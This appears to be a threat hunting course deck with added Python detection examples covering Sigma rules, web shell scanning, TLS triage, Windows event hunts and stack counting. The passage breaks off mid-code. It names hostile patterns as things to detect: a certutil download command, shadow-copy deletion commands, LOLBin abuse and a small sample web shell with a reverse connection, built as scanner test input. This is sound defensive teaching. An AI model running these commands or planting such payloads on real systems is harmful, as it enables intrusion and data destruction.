THREAT HUNTING IN CYBERWORLD
AKASH SARODE
AKASH SARODE @AKKY2892
 Threat Hunter
 Security researcher
 Twitter - @Akky2892
 Blog – https://akkysanj.wordpress.com
 Github - https://github.com/akky2892
 Creator of NoMoreMalware and HuntIT.
 Author of multiple whitepapers: Machine Learning – Learning Cybersecurity; Threat Hunting – Hunter or Hunted; Analysis Using Analytics in Cybersecurity.
 Previous Training – Machine learning : The Future.
COURSE DESCRIPTION
 Introduction to Threat Hunting
 Threat Hunting Terminology
 Threat Intelligence and IOC
 Hunting methodology
 Threat hunting - Network, Endpoint level
 Operationalizing & Automating Threat hunting
 Use case of Real-time Threat Hunting
 Research & Resources
 Further study and Road Ahead
COURSE INDEX
1. Introduction to Threat Hunting
• Threat hunting in Cyberworld
• Why to perform threat hunting
2. Terminologies in hunting
3. Introducing Threat Intelligence
• Threat Intelligence and Threat Hunting = Intelligent hunting
• Indicators of Compromise IOC
4. Threat Hunting methodology
• Threat hunting process & Threat Hunting loop
• Threat Hunting techniques
• Pyramid of pain
• Hunting Maturity model
5. Network hunting and Endpoint hunting
• Hunting Webshells
• Hunting malware
• Network traffic hunting
6. Using MITRE ATT&CK framework
• Sigma rules for threat hunting
7. Threat Hunting using SIEM
8. Examples of Threat hunting hunts
9. Real World Hunting Process
10. Machine Learning & Threat Hunting – Advanced hunting
11. Threat Hunting Resources
12. Conclusion
• Red Teamer cyber kill chain vs Blue teamer defense chain
INTRODUCTION TO THREAT HUNTING
 The process of proactively and iteratively searching through networks to detect and isolate
advanced threats that evade existing security solutions.
 My definition – Finding stuff.
 Threat hunting is not a technology but an approach.
 Data-driven approach rather than the traditional alert-driven approach.
 Applying analyst knowledge in an effective way to look for anomalies in the environment.
 Two ways to perform hunting –
 Manual
 Automated/Machine-assisted
THREAT HUNTING IN CYBERWORLD
 In the cyberworld, attackers are becoming more sophisticated every day.
 Modern attacks are often not detected by the alerts a SIEM generates out of the box.
 Need of the hour: a next-generation detection approach.
 Hunting is not tool dependent; it is people dependent.
 Machine learning can help to a certain extent, but manual triage is always required.
 Instead of reacting to attacks, start proactively looking for threats before the attack succeeds.
WHY TO PERFORM THREAT HUNTING
 An alert-driven approach alone is not sufficient.
 A hypothesis-driven approach is the future.
 Dependency on any single tool should be reduced; hunting can be performed with whatever tooling is available.
 Benefit: continuous improvement in detection capabilities, and discovery of malicious activity that no existing alert covers.
TERMINOLOGIES IN THREAT HUNTING
 SIEM – Security Information & Event Management
 IOC – Indicator of Compromise
 TTP – Tactics, Techniques & Procedures
 IR – Incident Response
 EDR – Endpoint Detection and Response
 UEBA – User and Entity Behavior Analytics
 BIOC – Behavioral Indicator of Compromise
THREAT INTELLIGENCE
 Threat intelligence is commonly consumed as feeds of indicators: URLs, file hashes, domains, IP addresses.
 It can be used to perform intelligence-led hunting.
 IOCs for an attack or threat are published by research teams and vendors.
 Sources:
 articles,
 security news,
 new public APT reports,
 Twitter
 BIOC – behavioral indicators: what the adversary does, rather than the artifacts it leaves behind.
 Threat hunting is more effective with good intelligence.
 The threat intel team proposes new intel, the CIRT team builds hypotheses and creates detections based on it, and the threat hunting team hunts with or without intel.
 Sources and tooling in the market: Cisco Talos, Palo Alto Unit 42, Cylance and AlienVault OTX (feeds and reports); MISP (intel sharing platform); YARA rules (file-level signatures).
Threat Intelligence + Threat Hunting = Intelligent Hunting
THREAT HUNTING METHODOLOGY
 There are different methods to perform threat hunting. We will explain the following:
 Threat Hunting process
 Threat Hunting loop
 Pyramid of pain
 Hunting Maturity model
 ATT&CK for hunts
 Hunt or be Hunted
THREAT HUNTING PROCESS
 Ways of hunting:
 Manual – the analyst continuously looks for anything that could be evidence or an indicator of intrusion.
 It is important for the threat hunter to keep current with the latest security research.
 Automated/machine-assisted – the analyst uses software that leverages machine learning and UEBA to surface potential risks.
 This helps provide predictive and prescriptive analytics.
 Hypothesis-driven approach
 What is a hypothesis?
 An assumption about attacker behavior.
 An actionable use case based on observations, intelligence and experience.
 Three types of hypotheses:
 Analytics-Driven: "Machine-learning and UEBA, used to develop aggregated risk scores
that can also serve as hunting hypotheses"[5]
 Situational-Awareness Driven: "Crown Jewel analysis, enterprise risk assessments,
company- or employee-level trends"[5]
 Intelligence-Driven: "Threat intelligence reports, threat intelligence feeds, malware
analysis, vulnerability scans"[
 A hypothesis can be developed from any public APT report, Twitter, security news, articles, etc.
THREAT HUNTING LOOP
THREAT HUNTING TECHNIQUES
 Searching – specialized queries over the data that return matching results and artifacts.
 Clustering – statistical or machine-learning grouping of similar data points (for example hosts with similar sets of running processes) across large datasets, so that outliers stand out.
 Grouping – taking a set of artifacts already flagged as interesting and grouping them by shared attributes (host, user, time window) to find related activity.
 Stack counting – counting how many times each unique value of a field occurs (process name, file path, user agent) across many hosts; rare values, such as a file accessed on only one host, are worth investigating.
PYRAMID OF PAIN
THREAT HUNTING MATURITY MODEL
Source : sqrrl TMM
MITRE ATT&CK FRAMEWORK
 MITRE ATT&CK™ is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.
 It is organised as TTPs: tactics (the adversary's goal), techniques (how the goal is achieved) and procedures (specific implementations seen in the wild).
 MITRE also maintains a companion project, CAR (Cyber Analytics Repository), which holds analytics written against ATT&CK techniques.
 ATT&CK catalogues the behaviors an adversary carries out on a victim system; its tactics line up roughly with the later phases of the Cyber Kill Chain (from exploitation through actions on objectives).
SIGMA RULES FOR THREAT HUNTING
 Sigma is a generic signature format for SIEM systems, written by Florian Roth (@Neo23x0) and Thomas Patzke.
 Sigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner.
 Sigma is for log files what Snort is for network traffic and YARA is for files.
 Sigma rules carry ATT&CK tags (for example attack.t1003 for credential dumping), so each rule maps to the techniques it covers; a converter translates a rule into a specific SIEM's query language.
 For using Sigma for threat hunting in a SIEM, refer to the Sigma-to project:
 https://github.com/akky2892/Sigma-to
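To show what a Sigma rule's detection block actually does when a SIEM applies it, here is a small evaluator, added for this page; it is not code from the slides, from the Sigma-to project or from the Sigma project itself (pySigma and sigma-cli are the real tooling). The rule, the CcmExec allowlist filter and the three process-creation events are constructed for the demo; the rule is written as a Python dict mirroring the YAML layout so the block runs without PyYAML.

```python
"""Minimal evaluator for a Sigma rule's detection block.

Added example, not code from the slides or from the Sigma project. It
supports only the subset the rule below uses: exact match, the |contains,
|startswith and |endswith modifiers, |all, list values (OR unless |all),
field maps (AND) and the conditions 'selection' and
'selection and not filter'.
"""
from typing import Any, Dict, List

# Assumed rule: the certutil download pattern from the hunts later in the deck.
RULE = {
    "title": "Certutil download from the internet",
    "tags": ["attack.command_and_control", "attack.t1105"],
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains|all": ["urlcache", "-split"],
        },
        # Assumed allowlist: a management agent that legitimately uses certutil.
        "filter": {"ParentImage|endswith": "\\ccmexec.exe"},
        "condition": "selection and not filter",
    },
}


def match_value(actual: Any, modifier: str, expected: str) -> bool:
    """Apply one modifier. Sigma string matching is case-insensitive."""
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    return a == e  # no modifier: exact match


def match_search(search: Dict[str, Any], event: Dict[str, Any]) -> bool:
    """A field map is an AND over its keys; a list value is an OR, or an
    AND when the key carries the |all modifier."""
    for key, expected in search.items():
        field, *mods = key.split("|")
        if field not in event:
            return False
        modifier = next((m for m in mods if m != "all"), "")
        combine = all if "all" in mods else any
        values = expected if isinstance(expected, list) else [expected]
        if not combine(match_value(event[field], modifier, v) for v in values):
            return False
    return True


def evaluate(rule: Dict[str, Any], event: Dict[str, Any]) -> bool:
    """Evaluate the rule condition for one event."""
    det = rule["detection"]
    cond = det["condition"].split()
    if cond == ["selection"]:
        return match_search(det["selection"], event)
    if cond == ["selection", "and", "not", "filter"]:
        return (match_search(det["selection"], event)
                and not match_search(det["filter"], event))
    raise NotImplementedError(f"condition not supported: {det['condition']}")


def hunt(rule: Dict[str, Any], events: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Return the events that fire the rule, annotated with its ATT&CK tags."""
    return [dict(e, tags=rule["tags"]) for e in events if evaluate(rule, e)]


# Constructed process-creation events with Sysmon-style field names.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example/file.txt a.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example/file.txt a.exe",
     "ParentImage": "C:\\Windows\\CCM\\CcmExec.exe"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -hashfile setup.msi SHA256",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
]

if __name__ == "__main__":
    for hit in hunt(RULE, EVENTS):
        print(hit["tags"], hit["CommandLine"])
```

Only the first event fires: the second is the same command line but excluded by the filter, the third is certutil doing something benign. The point worth noticing is that a plain list under `|contains` is an OR in Sigma; requiring both substrings needs `|contains|all`, which is a common mistake when writing rules by hand.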
HUNTING WEBSHELLS
 A web shell is a script, written in a language the target web server supports, that is uploaded to the server to give the attacker remote access to the machine.
 Mostly written in PHP or ASP/ASPX.
 Multiple attack techniques can be used to get a web shell onto a web server: file upload flaws, SQL injection, RFI, LFI & many more.
 Popular web shells – C99, R57, etc.
 Let's hunt it!
HUNTING WEBSHELLS - KEYWORDS
 First way of hunting web shells: look for references to suspicious keywords within files on the web server, such as eval() or cmd.exe.
 For Linux:
 Under the web root (for example /var/www/html) search PHP files for suspicious function calls:
 find /var/www/html -type f -name '*.php' -print0 | xargs -0 grep -lE '(fsockopen|mail|exec|eval|system|base64_decode)'
 For Windows:
 Use PowerShell to search the same way:
 Get-ChildItem -Recurse -Include *.php | Select-String -Pattern '(fsockopen|mail|exec|eval|system|base64_decode)' | ForEach-Object { $_.Path } | Sort-Object -Unique
 Expect false positives: mail() and exec() appear in legitimate code, so treat a hit as a lead, not a verdict, and compare against a known-good copy of the site.
HUNTING WEBSHELLS - TOOLS
 Multiple tools can be used to hunt for web shells in your environment; they combine IOCs and YARA rules to identify malicious files.
 LOKI IOC Scanner
 PHP-Malware-Finder
 UnPHP (PHP deobfuscator)
 Linux Malware Detect
 Invoke-ExchangeWebShellHunter
 etc.
 In addition to these techniques, baseline deviation (files absent from the last known-good snapshot) and file stacking (files rare across the web server fleet) can be used to hunt for web shells.
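The keyword search above says nothing about how suspicious a hit is, and it misses the common `eval(base64_decode('...'))` shape where the dangerous call is inside the encoded blob. The following scanner is an added example, not code from the slides or from any of the tools listed; it scores PHP files by weighted suspicious calls, doubles the score when request input (`$_GET`, `$_POST`, ...) is present in the same file, and decodes long base64 literals before scoring. The weights, the threshold of 6 and the three sample files are assumptions constructed for the demo.

```python
"""Keyword-based web shell triage over a directory of PHP files.

Added example, not part of the original slides. Weights, threshold and the
sample files are constructed for illustration; tune them against a
known-good copy of your own web root before trusting the scores.
"""
import base64
import os
import re
import tempfile

# Functions commonly chained in PHP web shells. Weights are assumptions:
# eval/assert fed by attacker input is almost always bad, mail()/exec()
# on their own appear in plenty of legitimate code, so they score low.
SUSPICIOUS_CALLS = {
    "eval": 5, "assert": 4, "system": 3, "passthru": 3, "shell_exec": 3,
    "popen": 3, "proc_open": 3, "exec": 2, "fsockopen": 2,
    "base64_decode": 2, "gzinflate": 2, "str_rot13": 2, "mail": 1,
}
# Request superglobals feeding the calls above are the real tell.
INPUT_SOURCES = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
CALL_RE = re.compile(r"\b(" + "|".join(SUSPICIOUS_CALLS) + r")\s*\(")
B64_BLOB = re.compile(r"['\"]([A-Za-z0-9+/=]{32,})['\"]")


def decode_base64_blobs(text: str) -> str:
    """Append the clear text of decodable base64 literals that look like PHP,
    so a shell hidden as eval(base64_decode('...')) is scored on its payload."""
    extra = []
    for blob in B64_BLOB.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError
            continue
        if "<?php" in decoded or CALL_RE.search(decoded):
            extra.append(decoded)
    return text + "\n" + "\n".join(extra)


def score_source(text: str) -> int:
    """Weighted sum of suspicious calls, doubled when request input also
    appears in the file (the usual web shell shape)."""
    text = decode_base64_blobs(text)
    score = sum(SUSPICIOUS_CALLS[c] for c in CALL_RE.findall(text))
    if score and INPUT_SOURCES.search(text):
        score *= 2
    return score


def hunt_webroot(root: str, threshold: int = 6):
    """Walk a web root; return [(path, score)] at or above threshold,
    highest first. A threshold of 6 (assumed) is roughly 'eval plus
    request input' or 'several shell-style calls together'."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                score = score_source(fh.read())
            if score >= threshold:
                hits.append((path, score))
    return sorted(hits, key=lambda h: -h[1])


# Constructed sample web root: a plain shell, an obfuscated shell, and a
# legitimate contact form that uses mail() and a harmless exec().
PAYLOAD = b"system($_GET['c']); fsockopen('10.0.0.1', 4444);"
SAMPLES = {
    "shell.php": "<?php eval($_POST['cmd']); ?>",
    "hidden.php": "<?php eval(base64_decode('"
                  + base64.b64encode(PAYLOAD).decode() + "')); ?>",
    "contact.php": "<?php mail($to, $subject, $body); exec('date'); ?>",
}


def demo():
    """Build the sample web root in a temp dir and hunt it."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in SAMPLES.items():
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        return [(os.path.basename(p), s) for p, s in hunt_webroot(root)]


if __name__ == "__main__":
    for name, score in demo():
        print(f"{score:3d}  {name}")
```

The obfuscated shell scores highest because the decoded payload contributes its own calls and its `$_GET`; the contact form scores 3 and stays below the threshold, which is the false-positive behaviour the grep one-liners above cannot give you.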
ENDPOINT HUNTING
 The endpoint is where malware behavior is most visible.
 Most post-exploitation techniques can be hunted using endpoint logs.
 File activity, registry activity and process activity can be used to hunt for malicious behavior.
 Attack techniques such as DLL injection and hook injection can be hunted using endpoint logs; fuzzy hashing (for example ssdeep) helps cluster variants of the same binary.
 MITRE ATT&CK is the best way to organise these efforts and decide what to hunt for.
DLL HIJACKING AND DLL INJECTION
 Post-exploitation techniques.
 DLL hijacking: a malicious DLL is placed where a program's DLL search order finds it before the legitimate one; hunt by monitoring DLL writes into application directories and changes to registry paths that control DLL loading.
 DLL injection: hunt by monitoring the classic Windows API sequence (Sysmon Event ID 8 records the CreateRemoteThread step):
 VirtualAllocEx reserves or commits a region of memory in another process
 WriteProcessMemory writes data into that region of the target process
 CreateRemoteThread creates a thread in the address space of the other process
APPINIT DLLS
 PowerSploit, a PowerShell post-exploitation framework, includes code-injection modules, so PowerShell command lines are worth watching as well.
 Monitoring malicious DLL loads – AppInit DLLs: DLLs listed in the AppInit_DLLs value under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows (and the Wow6432Node equivalent for 32-bit processes) are loaded by user32.dll into every process that loads user32.dll.
 Hunt for changes to that value (Sysmon Event ID 13) and for unsigned DLLs listed there. Note that AppInit_DLLs is disabled on Windows 8 and later when Secure Boot is enabled.
NETWORK HUNTING
 Network traffic hunting requires network traffic logs (flow records, proxy and DNS logs, or full packet capture).
 Multiple tools can be used to analyze suspicious network traffic.
 Next-generation firewalls, UTMs and IDS/IPS already flag some malicious traffic; hunting targets the traffic that passed those devices without an alert.
 Wireshark can be used for packet-level analysis.
 Let's look at a simple example:
NETWORK HUNTING – HTTPS TRAFFIC
HTTPS is HTTP over TLS (formerly SSL).
Normal HTTPS: port 443 or 8443
Suspicious: malware uses these ports as well, precisely because they are allowed outbound.
Normal HTTPS: traffic is encrypted
Suspicious: traffic on 443 that is not actually TLS (the dissector shows no TLS layer, no handshake is seen).
Normal HTTPS: the server is addressed by FQDN (SNI in the ClientHello, certificate name)
Suspicious: the client connects to a bare IP address, with no SNI or an IP literal in it.
Caveat: some legitimate software also connects by IP, and TLS 1.3 Encrypted Client Hello hides the SNI, so treat these as leads to pivot on, not verdicts.
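To make the two "suspicious" rows above checkable rather than eyeballed in Wireshark, here is an added example (not from the slides) that looks at the first client bytes of a port-443 flow: it decides whether they are a TLS ClientHello, pulls the SNI out, and flags plaintext-on-443, missing SNI and IP-literal SNI. The `build_client_hello` helper only exists to construct test input; the four sample flows are constructed, and the 203.0.113.x addresses are documentation ranges.

```python
"""Triage of client bytes on an HTTPS port: is it TLS, and what is the SNI?

Added example, not code from the slides. Handles only TLS 1.0-1.3 ClientHello
records (the TLS 1.3 hello still uses record version 0x0301/0x0303 and the
same SNI extension); anything else is reported as 'not TLS'.
"""
import ipaddress
import struct
from typing import List, Optional, Tuple


def build_client_hello(sni: Optional[str]) -> bytes:
    """Construct a minimal TLS 1.2 ClientHello. Test input only."""
    body = b"\x03\x03" + b"\x00" * 32 + b"\x00"   # version, random, empty session id
    body += struct.pack("!H", 2) + b"\x13\x01"     # one cipher suite
    body += b"\x01\x00"                            # one compression method: null
    exts = b""
    if sni is not None:
        name = sni.encode()
        entry = b"\x00" + struct.pack("!H", len(name)) + name   # host_name entry
        lst = struct.pack("!H", len(entry)) + entry
        exts += struct.pack("!HH", 0, len(lst)) + lst           # extension type 0 = SNI
    body += struct.pack("!H", len(exts)) + exts
    hs = b"\x01" + len(body).to_bytes(3, "big") + body          # handshake type 1
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs    # record type 0x16


def parse_client_hello(data: bytes) -> Tuple[bool, Optional[str]]:
    """Return (is_tls_client_hello, sni). sni is None when absent."""
    if len(data) < 9 or data[0] != 0x16 or data[1] != 0x03 or data[5] != 0x01:
        return False, None
    p = 9 + 2 + 32                      # record hdr, handshake hdr, version, random
    p += 1 + data[p]                    # session id
    p += 2 + struct.unpack_from("!H", data, p)[0]   # cipher suites
    p += 1 + data[p]                    # compression methods
    if p + 2 > len(data):
        return True, None               # no extensions block at all
    end = p + 2 + struct.unpack_from("!H", data, p)[0]
    p += 2
    while p + 4 <= end:
        etype, elen = struct.unpack_from("!HH", data, p)
        p += 4
        if etype == 0:                  # server_name: list len(2), type(1), len(2), name
            name_len = struct.unpack_from("!H", data, p + 3)[0]
            return True, data[p + 5:p + 5 + name_len].decode("ascii", "ignore")
        p += elen
    return True, None


def triage_flow(dst_port: int, first_bytes: bytes) -> List[str]:
    """Findings for one client-to-server flow; empty list means nothing odd."""
    findings: List[str] = []
    if dst_port not in (443, 8443):
        return findings
    is_tls, sni = parse_client_hello(first_bytes)
    if not is_tls:
        findings.append("not TLS on an HTTPS port")
        return findings
    if sni is None:
        findings.append("TLS without SNI: client most likely connected by IP")
    else:
        try:
            ipaddress.ip_address(sni)
            findings.append(f"SNI is an IP literal: {sni}")
        except ValueError:
            pass                         # a hostname, as expected
    return findings


# Constructed flows: a browser, a no-SNI client, an IP-literal SNI, a
# plaintext HTTP beacon on 443, and an unrelated port-80 request.
FLOWS = {
    "browser": (443, build_client_hello("www.example.com")),
    "no_sni": (443, build_client_hello(None)),
    "ip_sni": (443, build_client_hello("203.0.113.10")),
    "plaintext": (443, b"GET /gate.php HTTP/1.1\r\nHost: 203.0.113.10\r\n\r\n"),
    "other_port": (80, b"GET / HTTP/1.1\r\n\r\n"),
}


def demo():
    return {name: triage_flow(port, data) for name, (port, data) in FLOWS.items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(f"{name:11s} {findings or 'ok'}")
```

Feed it the first client payload of each flow from a pcap (for example via a small pyshark or scapy loop) and stack the findings by destination IP; the plaintext case is the strongest signal, the no-SNI case needs the caveat above applied.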
THREAT HUNTING USING SIEM
 Threat hunting is, at its core, searching.
 We need proper, useful data to hunt for threats in the enterprise.
 A SIEM (Security Information & Event Management) is one tool that can prove useful for threat hunting.
 A SIEM collects logs from multiple devices across the enterprise network.
 In addition to matching threat intelligence feeds, the SIEM is useful for querying the log store to identify anomalies.
 Let's look at some use cases:
[Figure: example SIEM hunt. Source: elastic.co]
Common phishing chain: Word/Excel macro attachments
• Phishing email carrying a .doc with a macro
• The macro launches powershell.exe (hunt: winword.exe or excel.exe as the parent of powershell.exe)
• PowerShell loads a credential-dumping tool such as Mimikatz to read hashes from LSASS memory (hunt: PowerShell command lines and script block logs, Event ID 4104)
• Which Mimikatz commands were executed
 Windows event logs forwarded to the SIEM can be used to hunt for many threats.
 Sysmon can be used to collect endpoint-specific telemetry (process creation, network connections, registry changes) based on a defined configuration.
 Search queries are useful for identifying malicious behavior inside the enterprise environment.
 In addition to threat intelligence and search queries, SIEM analytics use machine learning to automatically surface anomalies in the environment.
 Some example hunts, to make this concrete:
THREAT HUNTING HUNTS
Threat activity – Hunts to look out for
Hunting suspicious accounts – unusual accounts logging on with admin rights: Event ID 4672 (special privileges assigned to new logon)
Hunting scheduled tasks – Event ID 4698 (task created), Task Scheduler operational log Event IDs 106, 200 and 201
Hunting pass the hash (PtH) – Event ID 4624 with logon type 3, logon process NtLmSsp, authentication package NTLM, key length 0; filter out machine accounts and correlate with the source host
Hunting for service creation – Event ID 4697 (and System log Event ID 7045)
Hunting network shares – Event IDs 5140 and 5145 (network share and share object accessed); Event ID 4776 is NTLM credential validation on the DC, useful for spotting NTLM logons from unexpected hosts
Hunting for process masquerading – check the path a process runs from: explorer.exe should run from C:\Windows\explorer.exe (or C:\Windows\SysWOW64\explorer.exe), svchost.exe from C:\Windows\System32\svchost.exe
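Three of the hunts in the table, run as code over Windows Security events, as an added example that is not part of the slides. Events are constructed dicts using the field names from the Security log's EventData (EventID, TargetUserName, LogonType, AuthenticationPackageName, KeyLength, NewProcessName, SubjectUserName); KeyLength is an int here where the real log carries a string. The admin allowlist and the expected binary paths are assumptions for the demo.

```python
"""Pass-the-hash, process masquerading and special-privilege hunts over
Windows Security events.

Added example, not from the slides. Events below are constructed; in a
SIEM the same logic is a filter plus a stack on user and source host.
"""
from typing import Dict, List, Tuple

# Accounts expected to receive special privileges (assumed).
KNOWN_ADMINS = {"svc_backup", "itadmin"}

# Legitimate locations of core binaries (assumed for the demo; lower-case).
# explorer.exe is not in System32; svchost.exe never runs from a user path.
EXPECTED_PATHS = {
    "explorer.exe": {r"c:\windows\explorer.exe", r"c:\windows\syswow64\explorer.exe"},
    "svchost.exe": {r"c:\windows\system32\svchost.exe", r"c:\windows\syswow64\svchost.exe"},
    "lsass.exe": {r"c:\windows\system32\lsass.exe"},
}


def hunt_pass_the_hash(events: List[Dict]) -> List[Tuple[str, str]]:
    """4624 / LogonType 3 / NTLM / KeyLength 0 is the classic PtH shape.
    Caveat: ordinary NTLM network logons look identical, so machine
    accounts and ANONYMOUS LOGON are dropped and the rest is returned as
    (user, source IP) pairs to stack and pivot on, not as verdicts."""
    hits = []
    for e in events:
        if e.get("EventID") != 4624 or e.get("LogonType") != 3:
            continue
        user = e.get("TargetUserName", "")
        if user.endswith("$") or user.upper() == "ANONYMOUS LOGON":
            continue
        if e.get("AuthenticationPackageName") == "NTLM" and e.get("KeyLength") == 0:
            hits.append((user, e.get("IpAddress", "")))
    return hits


def hunt_masquerading(events: List[Dict]) -> List[str]:
    """4688 where the image name is a core binary but the full path is not
    one of its legitimate locations."""
    hits = []
    for e in events:
        if e.get("EventID") != 4688:
            continue
        path = e.get("NewProcessName", "").lower()
        name = path.rsplit("\\", 1)[-1]
        allowed = EXPECTED_PATHS.get(name)
        if allowed is not None and path not in allowed:
            hits.append(path)
    return hits


def hunt_special_privileges(events: List[Dict]) -> List[str]:
    """4672 for accounts outside the known admin set. SYSTEM and machine
    accounts generate these constantly and are excluded."""
    hits = set()
    for e in events:
        if e.get("EventID") != 4672:
            continue
        user = e.get("SubjectUserName", "")
        if user.endswith("$") or user.upper() == "SYSTEM":
            continue
        if user.lower() not in KNOWN_ADMINS:
            hits.add(user)
    return sorted(hits)


# Constructed events.
EVENTS = [
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "jdoe",
     "AuthenticationPackageName": "NTLM", "LogonProcessName": "NtLmSsp ",
     "KeyLength": 0, "IpAddress": "10.1.1.55"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "WS01$",
     "AuthenticationPackageName": "NTLM", "KeyLength": 0, "IpAddress": "10.1.1.7"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "jdoe",
     "AuthenticationPackageName": "Kerberos", "KeyLength": 0, "IpAddress": "10.1.1.55"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\explorer.exe"},
    {"EventID": 4688, "NewProcessName": r"C:\Users\jdoe\AppData\Roaming\svchost.exe"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 4672, "SubjectUserName": "SYSTEM"},
    {"EventID": 4672, "SubjectUserName": "itadmin"},
    {"EventID": 4672, "SubjectUserName": "jdoe"},
]

if __name__ == "__main__":
    print("PtH candidates:", hunt_pass_the_hash(EVENTS))
    print("Masquerading:", hunt_masquerading(EVENTS))
    print("Unexpected special privileges:", hunt_special_privileges(EVENTS))
```

Each hunt returns a short list to investigate rather than a boolean: the PtH output in particular is only meaningful once stacked (which users, from which hosts, how often) against what the environment normally does.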
 PtH – look for remote logons associated with execution or writing of binaries.
 IFEO (Image File Execution Options) – changes to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<target>.exe\Debugger
 rundll32.exe making connections to the internet.
 Deletion of shadow copies: vssadmin delete shadows or wmic shadowcopy delete.
 Disabling System Restore – registry write to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore (or the policy key HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore), value DisableSR = 1
 Connections from processes other than a browser to suspicious domains (.tk, .onion, tor2web gateways, etc.)
 certutil.exe used to download files from the internet: certutil.exe -urlcache -split -f http://example/file.txt
 Monitor scheduled tasks – at.exe and schtasks.exe drive the Windows Task Scheduler, which is used to schedule scripts for execution.
 Double-extension malware (for example invoice.pdf.exe).
 control.exe used to execute a .cpl stored in an alternate data stream (ADS).
 gpscript.exe used to execute logon scripts.
 mavinject.exe used to inject a DLL into a process, including a DLL stored in an ADS.
 hh.exe – executing and downloading files.
 scriptrunner.exe – execution.
 regsvr32.exe – downloading and executing a scriptlet from the internet.
All are Windows-signed binaries (LOLBins), so signature-based endpoint protection rarely flags them; hunt on command-line arguments and parent/child process relationships instead.
 Similar to the hunts discussed, there are many more techniques that can be used to hunt for threats.
 A collection of many such techniques is collated and presented by MITRE ATT&CK and the Sigma rules repository.
 Hunting using a SIEM is the way ahead, but there are multiple SIEM vendors: RSA, Elastic, ArcSight, QRadar, etc.
 To make life easier, I have prepared a master sheet of threat hunting hunts mapped to the respective SIEM vendors:
 Query it & Hunt IT – https://github.com/akky2892/Sigma-to/blob/master/Sigma-to.xlsx
REAL WORLD HUNTING PROCESS
What is threat hunting:- The human-centric process of proactively searching for evidence of
attacks. Anyone can threat hunt; experienced threat hunters have better models.
Threat hunting is the application of one or more models or frameworks to a problem. The easiest framework to start with is Attack Centric Hunting (ACH), where you focus on seeking evidence that identifies a specific attack. It is a four-step process that starts with a question.
 1. Question – has a specific attack occurred on my network?
 2. What am I looking for?
 3. Where am I likely to find it?
 4. How can I manipulate the data to find it?
Example:
Question: Has credential theft happened on my network?
 1. What am I looking for?
a) Evidence of credential-dumping tool execution.
b) Never-before-seen processes, process anomalies.
 2. Where am I likely to find it?
a) Windows process execution logs.
 3. How can I manipulate the data to see it?
a) Aggregate Event ID 4688 (process creation) by process name across all endpoints and sort by least frequent occurrence (LFO).
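Step 3 above, and the stack counting technique described earlier in the deck, carried out in code as an added example (not from the slides). The 4688-style records, the four hosts and the baseline are constructed; the fleet is deliberately tiny so the rare items are obvious, which on a real fleet they are not. Two choices a practitioner makes are shown: counting distinct hosts rather than raw events (so one chatty process does not look common), and comparing against a baseline stack so a tool that was merely rare last week still shows up as new.

```python
"""Stack counting (least frequent occurrence) over process-creation events.

Added example, not code from the slides. Input is a list of 4688-style
dicts with Computer and NewProcessName; the data below is constructed.
"""
from collections import Counter, defaultdict
from typing import Dict, List, Tuple


def stack_count(events: List[Dict], field: str = "NewProcessName",
                by_host: bool = True) -> List[Tuple[str, int]]:
    """For each unique value of `field`, count the distinct hosts it was
    seen on (by_host=True) or the raw events. Returns (value, count)
    pairs, rarest first, ties broken by value for a stable order."""
    if by_host:
        hosts = defaultdict(set)
        for e in events:
            hosts[e[field].lower()].add(e["Computer"])
        counts = {v: len(h) for v, h in hosts.items()}
    else:
        counts = Counter(e[field].lower() for e in events)
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))


def least_frequent(events: List[Dict], field: str = "NewProcessName",
                   max_hosts: int = 1) -> List[str]:
    """The LFO shortlist: values seen on at most `max_hosts` hosts."""
    return [v for v, n in stack_count(events, field) if n <= max_hosts]


def new_since_baseline(events: List[Dict], baseline: List[Dict],
                       field: str = "NewProcessName") -> List[str]:
    """Values present now but absent from an earlier baseline stack."""
    seen_before = {v for v, _ in stack_count(baseline, field)}
    return [v for v, _ in stack_count(events, field) if v not in seen_before]


def make(computer: str, path: str) -> Dict:
    return {"EventID": 4688, "Computer": computer, "NewProcessName": path}


# Constructed fleet: four workstations, last week's baseline, and today.
HOSTS = ["WS01", "WS02", "WS03", "WS04"]
BASELINE = (
    [make(h, r"C:\Windows\System32\svchost.exe") for h in HOSTS]
    + [make(h, r"C:\Windows\explorer.exe") for h in HOSTS]
    + [make("WS02", r"C:\Tools\procexp64.exe")]      # rare but known
)
TODAY = BASELINE + [
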